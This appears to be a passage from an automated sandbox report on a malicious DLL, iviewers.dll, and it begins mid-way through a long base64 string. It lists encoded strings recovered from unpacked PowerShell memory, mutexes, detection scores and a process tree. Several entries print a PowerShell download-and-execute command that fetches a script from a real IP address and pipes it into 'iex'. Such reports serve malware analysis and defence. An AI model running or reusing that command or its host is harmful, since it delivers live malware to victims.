FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
            Source: 13.2.powershell.exe.588e750.0.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
            Source: 13.2.powershell.exe.588e750.0.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
            Source: 15.2.powershell.exe.4b7ea38.1.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
            Source: 15.2.powershell.exe.4b7ea38.1.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
            Source: 15.2.powershell.exe.4b946b8.0.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
            Source: 15.2.powershell.exe.4b946b8.0.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDLL@71/60@1/2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00430C70 CoCreateInstance,31_2_00430C70
            Source: C:\Windows\System32\loaddll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\loaddll32.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
            Source: C:\Windows\System32\loaddll32.exeFile created: C:\Users\user\AppData\Local\Temp\ceo01y5gJump to behavior
            Source: iviewers.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: iviewers.dllStatic file information: TRID: Win32 Dynamic Link Library (generic) Net Framework (1011504/3) 44.80%
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
            Source: iviewers.dllVirustotal: Detection: 38%
            Source: iviewers.dllReversingLabs: Detection: 36%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\iviewers.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES61E6.tmp" "c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES63AB.tmp" "c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP"
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C65.tmp" "c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
